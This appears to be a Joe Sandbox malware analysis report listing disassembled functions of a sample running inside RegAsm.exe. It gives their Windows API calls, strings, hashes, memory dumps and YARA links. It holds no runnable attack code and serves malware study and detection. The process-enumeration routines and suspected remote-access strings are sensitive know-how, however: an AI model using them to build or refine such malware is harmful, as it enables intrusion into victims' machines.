                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          • API String ID: 0-643455097
                                                          • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                                          • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                                          • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                                          • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                                          Function 0044333A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                          • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                                          • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                          • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                                          Function 10004B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                          • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                          • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                          • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                          Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                          • String ID: KeepAlive | Disabled
                                                          • API String ID: 2993684571-305739064
                                                          • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                                          • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                                          • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                                          • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                                          Function 0041ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                                          • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                                          • Sleep.KERNEL32(00002710), ref: 0041AE07
                                                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: PlaySound$HandleLocalModuleSleepTime
                                                          • String ID: Alarm triggered
                                                          • API String ID: 614609389-2816303416
                                                          • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                                          • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                                          • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                                          • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                                          Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                                          • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                                                          • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                                                          • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                                                          Strings
                                                          • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                          • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                          • API String ID: 3024135584-2418719853
                                                          • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                          • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                                          • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                          • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                                          Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                          • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                                          • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                          • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                                          Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                          • _free.LIBCMT ref: 00444E06
                                                          • _free.LIBCMT ref: 00444E1D
                                                          • _free.LIBCMT ref: 00444E3C
                                                          • _free.LIBCMT ref: 00444E57
                                                          • _free.LIBCMT ref: 00444E6E
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 3033488037-0
                                                          • Opcode ID: bc830042460a8b7e4f23ea146b673c7d23acc7bc4933b5c91394f116147f2234
                                                          • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                                          • Opcode Fuzzy Hash: bc830042460a8b7e4f23ea146b673c7d23acc7bc4933b5c91394f116147f2234
                                                          • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                                          Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                          • _free.LIBCMT ref: 004493BD
                                                            • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                          • _free.LIBCMT ref: 00449589
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                          • String ID:
                                                          • API String ID: 1286116820-0
                                                          • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                          • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                                          • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                          • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                                          Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                            • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                                            • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                                            • Part of subcall function 0041BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C005
                                                            • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                            • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 2180151492-0
                                                          • Opcode ID: 8b8cdfc602dbd14a3ce60d1437fbf9c616907d32c1791499aac7107a218dc19c
                                                          • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                                          • Opcode Fuzzy Hash: 8b8cdfc602dbd14a3ce60d1437fbf9c616907d32c1791499aac7107a218dc19c
                                                          • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                                          Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                          • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                                          • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                          • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                                          Function 0045112C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                                                          • __alloca_probe_16.LIBCMT ref: 004511B1
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                                                          • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                                                          • __freea.LIBCMT ref: 0045121D
                                                            • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                          • String ID:
                                                          • API String ID: 313313983-0
                                                          • Opcode ID: 96f15bfe140a09faeb809ebc5c29b58b41f03d59f1561ac9dee06a5207780793
                                                          • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                                          • Opcode Fuzzy Hash: 96f15bfe140a09faeb809ebc5c29b58b41f03d59f1561ac9dee06a5207780793
                                                          • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                                          Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                                            • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                                          • _free.LIBCMT ref: 0044F3BF
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                          • String ID:
                                                          • API String ID: 336800556-0
                                                          • Opcode ID: d8ae35f0e3060a242d199930de563035f78cbeddf85e30d7e5766290ad92fb82
                                                          • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                                          • Opcode Fuzzy Hash: d8ae35f0e3060a242d199930de563035f78cbeddf85e30d7e5766290ad92fb82
                                                          • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                                          Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                          • _free.LIBCMT ref: 100071B8
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                          • String ID:
                                                          • API String ID: 336800556-0
                                                          • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                          • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                          • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                          • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                          Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                          • _free.LIBCMT ref: 10005BB4
                                                          • _free.LIBCMT ref: 10005BDB
                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$_free
                                                          • String ID:
                                                          • API String ID: 3170660625-0
                                                          • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                          • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                          • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                          • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                          Function 0041C1DD Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                          • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C228
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseHandleOpen$FileImageName
                                                          • String ID:
                                                          • API String ID: 2951400881-0
                                                          • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                                          • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                                          • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                                          • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                                          Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                          • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                          • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$lstrcat
                                                          • String ID:
                                                          • API String ID: 493641738-0
                                                          • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                          • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                          • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                          • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                          Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 004509D4
